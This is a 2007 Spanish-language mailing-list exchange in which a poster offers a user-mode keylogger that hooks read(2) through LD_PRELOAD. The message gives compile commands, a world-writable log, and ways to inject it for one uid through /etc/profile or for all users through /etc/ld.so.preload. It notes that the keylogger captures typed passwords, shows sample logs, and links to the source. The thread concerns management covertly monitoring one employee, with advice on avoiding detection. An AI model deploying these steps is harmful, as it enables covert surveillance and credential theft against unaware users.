Marco:
Hace un tiempo programe un keylogger muy basico en modo usuario, usando
una shared lib, que captura la llamada a read(2) usando ld.so(8).
Para lo que yo necesitaba funciona bien, guarda lo que escribe usando
el bash y si,
se conecta a otra maquina te guarda el password :-), fijate si te
sirve, no tiene
documentacion, solo lo que estoy escribiendo aca.
Tenes el codigo a la vista, para modificarlo y revisarlo a gusto. En
el fuente te dice
como compilarlo y cambia el FILELOG por el lugar donde quieras guardar el log.
Ejemplo basico de uso:
gcc -Wall -ldl -fPIC -shared -o myread2.so myread2.c
touch /tmp/log
chmod 777 /tmp/log
LD_PRELOAD=./myread2.so bash
Otro ejemplo, quiero monitorear el usuario con uid = 1003
Agrego en /etc/profile
if [ "`id -u`" -eq 1003 ]; then
LD_PRELOAD=/tmp/myread2.so exec bash
fi
Ejemplo NO RECOMENDADO:
si quisieras ponerlo para "TODOS" los usuarios, en /etc/ld.so.preload
agregar el
path completo al .so, OJO con eso!, si hubiera un error aunque sea
minimo podrias
no levantar ningun read(2).
Asi es el archivo que genera:
foo:/tmp# cat log
[15-03 17:16 1003] ls -al
[15-03 17:16 1003] soy yo u otro?!!!!!!!!!!!!!!!!find /tmp
Lo que aparece con "!" son caracteres no imprimibles, en ese caso el
usuario borro
la tecla BKSP en el bash "soy yo u otro?", pero el buffer se conserva marcando
justamente eso.
Podes bajarlo de:
http://people.baicom.com/~agramajo/misc/myread2.c
Realmente si queres loguear TODO no es la forma, ya que si el usuario entra al
vim, por ej, no lo vas a ver, ahi deberias pensar en el modulo de kernel que
mencionaste.
Saludos y espero que sirva para algo.
On 3/15/07, Arturo 'Buanzo' Busleiman <[EMAIL PROTECTED]> wrote:
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Marco Antonio de Hoyos wrote:
> no. el trabajo es para realizar en un desktop linux, el cual es usado
> x un unico usuario, el cual la gerencia necesita saber todo lo que
> "escribe" por una presunta sospecha.
Metele un vnc y grabalo todo en un video flash... Ah, y los keyloggers que
mejor funcionan son para
kernel 2.4.
Y mejor que lo hagas muy bien, porque sino el unico usuario se puede avivar y
vos quedas para el
toor delante de tu cliente.
- --
Arturo "Buanzo" Busleiman - Consultor Independiente en Seguridad Informatica
Enigform for Firefox: A secure browsing experience: http://enigform.mozdev.org
Mail Hosting Seguro y Consultoria - http://www.buanzo.com.ar/pro/
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org
iD4DBQFF+VB9AlpOsGhXcE0RAjOVAJ9iGKiRZJaIWiiiAGFa1o5qUP3K7gCTBWW6
BIQwqb/72C3eBImRrtocSQ==
=zM1J
-----END PGP SIGNATURE-----
--
Para desuscribirte tenés que visitar la página
https://listas.linux.org.ar/mailman/listinfo/lugar-gral/
/* Publica y encontra trabajo relacionado con softlibre en
http://www.usla.org.ar/modules/jobs/ */
Si tenés algún inconveniente o consulta escribí a mailto:[EMAIL PROTECTED]
--
Para desuscribirte tenés que visitar la página
https://listas.linux.org.ar/mailman/listinfo/lugar-gral/
/* Publica y encontra trabajo relacionado con softlibre en
http://www.usla.org.ar/modules/jobs/ */
Si tenés algún inconveniente o consulta escribí a mailto:[EMAIL PROTECTED]
